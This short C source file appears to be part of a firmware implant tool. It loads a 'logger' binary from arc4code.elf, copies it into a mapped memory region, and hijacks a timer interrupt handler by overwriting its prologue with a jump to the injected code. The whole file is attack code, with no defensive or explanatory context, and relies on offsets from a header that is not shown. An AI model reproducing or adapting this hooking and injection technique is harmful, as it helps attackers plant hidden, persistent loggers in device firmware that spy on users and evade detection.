#include <sys/mman.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <stdio.h>
#include <string.h>

#include "arc_const.h"
#define PAYLOAD_SIZE		8192

char buf[PAYLOAD_SIZE];
int loadcode(char *ptr)
{
	int n;
	int fd = open("arc4code.elf", O_RDONLY);
	if (fd <= 0) {
		perror("open arc4 code");
		return 0;
	}
	n = read(fd, buf, PAYLOAD_SIZE);
	printf("read %d bytes of logger\n", n);
	close(fd);
	memcpy(ptr, buf, PAYLOAD_SIZE);
	memcpy(ptr + DATA_SECTION_OFF, buf, PAYLOAD_SIZE);
	return 1;
}

void work(char *ptr)
{
	unsigned long long off = ARC4_ENTRY_POINT;
	unsigned long long *hk =
	    (unsigned long long *) (ptr + TIMER_HANDLER_OFF);
	if (*hk != TIMER_HANDLER_PROLOGUE) {
		printf
		    ("the timer handler contains unexpected value 0x%llx, aborting\n",
		     *hk);
		return;
	}
	if (!loadcode(ptr + SCRATCH_OFF))
		return;
	*hk = ARC4_ABS_JMP_OPCODE + ((off / 4) << 32);
}
